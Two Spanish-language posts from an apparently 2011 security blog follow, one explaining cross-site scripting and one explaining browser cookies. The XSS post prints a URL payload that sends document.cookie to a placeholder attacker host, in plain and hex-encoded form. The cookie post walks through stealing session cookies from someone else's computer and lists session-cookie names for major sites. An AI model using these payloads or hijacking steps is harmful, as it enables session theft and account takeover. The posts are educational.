<a onMouseOver="alert(document.cookie);">Ejemplo</a>
Generalmente este código es insertado en espacios de texto, como los que existen para comentarios, o
posts en facebook o twitter. Aunque también es posible ocultarlo en un mensaje de correo, animaciones en flash, etc.
Existen 3 tipos de ataques XSS, persistentes, no persistentes y por DOM; los persistentes, son por ejemplo, mensajes maliciosos con código que se encuentran en foros, páginas de video, etc. Sólo te roban la cookie de la página en la que se encuentran y dejan de funcionar sólo cuando son borrados.
El tipo no persistente, son links que se envían por correo o por redes sociales, donde se incluye en parte del URL (la dirección del sitio) el script para que la persona piense que esta entrando a su sesión de usuario. Este tipo de ataques sólo funciona cuando la persona entra directamente haciendo click en el url y lucen algo así:
http://portal.example/index.php?sessionid=12312312&
username=<script>document.location='http://attackerhost.example/cgi-
bin/cookiesteal.cgi?'+document.cookie</script>
o, ya codificados en hexadecimal para ocultar el javascript.
http://portal.example/index.php?sessionid=12312312&
username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65
%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70
%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65
%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F
%6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64
%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73
%63%72%69%70%74%3E
Otro grave problema es que en el caso de páginas como twitter, han nacido servicios como bit.ly que encogen la URL para que no ocupe tanto espacio, sin embargo esto da oportunidad al atacante de ocultar mucho mejor su url modificado.
Los ataques de Cross-Site Scripting hasta la fecha son la vulnerabilidad de la cual padecen más páginas hasta la fecha, en el 2007 la empresa Symantec calculó que un 80% de las páginas de internet eran vulnerables a este tipo de ataques.
Incluso existe una base de datos de sitios expuestos con estas vulnerabilidades llamada XSSED.
Para parchar este tipo de vulnerabilidades, basta con que el sitio incluya un script en su servidores que verifique los posts antes de que sean enviados.
En cuanto a usuarios normales, hay que evitar en especial los ataques no persistentes, tomando en cuenta en que tipo de páginas se entra, a donde llevan los links, o si se confía en la persona envió esa información.
Links de interés:
Tutorial básico de cookies
Tutorial básico de XSS
Más Información del XSS
Preguntas más frecuentes del XSS
UPDATE:
Me encontré un excelente tutorial cortesía de Lord Epsylon acerca de XSS, es algo largo pero viene muy bien explicado; link.
lunes, 7 de marzo de 2011
Cookies.. ¿Qué son y con qué se comen?
Una cookie, tambien conocida como web cookie, o browser cookie, es un pedazo de texto que se almacena en tu navegador (Safari, firefox, Google Chrome, etc), y puede ser usada para autentificarte en una sesión, guardar las preferencias o para revisar los artículos que guardas en tu "carrito de compras"; como este es un blog de seguridad informática nos enfocaremos principalmente a los cookies de autenticación.
NOTA: si se estaban preguntando, el nombre de cookie viene de "Magic Cookie" que consistía en información no importante que se pasaba de un programa a otro, que a su vez deriva su nombre de "fortune cookie" que son las populares galletas chinas que pretenden dictar la suerte de una persona.
¿Cómo Funcionan?
Primero se visita un sitio de internet
Muchos sitios tienen la opción "Recordar sesión", "No cerrar sesión", etc., para "recordar" tu sesión, lo que hacen es simplemente guardar una cookie en tu navegador, estas cookies son cadenas de texto y suelen lucir algo así:
El nombre indica el nombre de la cookie, generalmente va relacionado de acuerdo a su función como en este ejemplo se refiere a las preferencias de google.
El contenido es la cookie en sí, es una cadena de texto encriptada (o no), que indica distintas cosas dependiendo del tipo de cookie que sea; para las sesiones esta cookie es generada por el servidor como una clave de autenticación única que se relaciona con el usuario, en este ejemplo indica preferencias de google, como el idioma, el tamaño de la pantalla, etc.
Dominio, es el dominio de internet al que pertenece la cookie, (por ejemplo google.com)
La ruta, es la dirección del dominio de la cookie, (por ejemplo google.com/calendar)
Tipo de conexión, se refiere si acepta los protocolos HTTP o HTTPS, del cual hablaré más adelante.
La fecha de expiración dice cuando la cookie se volverá inválida y tendra que ser renovada (en mi experiencia, estas fechas van desde 1 día hasta años... me he llegado a encontrar cookies que caducan hasta el 2035!).
Pasar cookies de un navegador a otro de forma manual (Robar cookies).
Supongamos que tienes acceso físico a la computadora de alguien más,
¿Es posible conseguir las cookies de su navegador para que pueda acceder a sus sesiones?
- Por su puesto que sí.
Algunos navegadores muestran la opción de "exportar cookies" a un archivo de texto, esto es útil cuando piensas cambiarte de computadora y quieres que tus sesiones se vayan contigo... o si quieres "robar" la sesión de alguien más.
AVISO: como siempre, NO ME HAGO RESPONSABLE DE LAS ESTUPIDECES QUE SEAN CAPACES DE COMETER.
En Internet Explorer 8.0
Se hace click en Importar/Exportar -> Exportar a un Archivo -> Cookies -> La ruta y listo!
Para Chrome y Firefox, los datos de las cookies se encuentran en los siguientes directorios (en Windows)
Chrome --> C:\Users\"Nombre del Usuario"\AppData\Local\Google\Chrome\User Data\Default\
Firefox --> C:\Users\"Nombre del Usuario"\AppData\Roaming\Mozilla\Firefox\Profiles\User
Una vez que tienes el archivo de texto puedes manipularlo de cualquier forma, incluyendo copiarlo a una memoria USB. (Considero que este es un problema de seguridad sin resolver, puesto que no debería de darse acceso irrestringido a este tipo de documentos sin autenticarse como administrador).
Ya en tu propia computadora, procedemos a crear las nuevas cookies con los valores del archivo de texto, esto puede ser eligiendo la opción "importar" en varios navegadores, o bien, usando un editor de cookies para incluir solo las cookies que nos interesan (las cookies de sesión).
Para esto yo uso uno llamado Edit Cookies que es un add-on gratuito de firefox
Copiamos el nombre, contenido, dominio y ruta de la cookie de la víctima y listo! podemos entrar a su sesión sin necesidad de introducir la contraseña.
Ahora bien, como antes explicaba, solo nos interesan las cookies de sesión; sin embargo el nombre que estas toman varían dependiendo del sitio que las crea; he aquí algunos nombres de cookies de sesión de sitios populares, (algunos necesitan más de 1 cookie para funcionar de forma correcta).
Twitter --> _twitter_sess , auth_token
Facebook --> xs , c_user
Windows Live --> MSPProf , MSPAuth , RPSAuth , NAP
Google --> SID , HSID
Espero que les haya gustado :) , la próxima semana hablaré sobre Cross-site Scripting (XSS) y Session Hijacking.
Suscribirse a:
Entradas (Atom)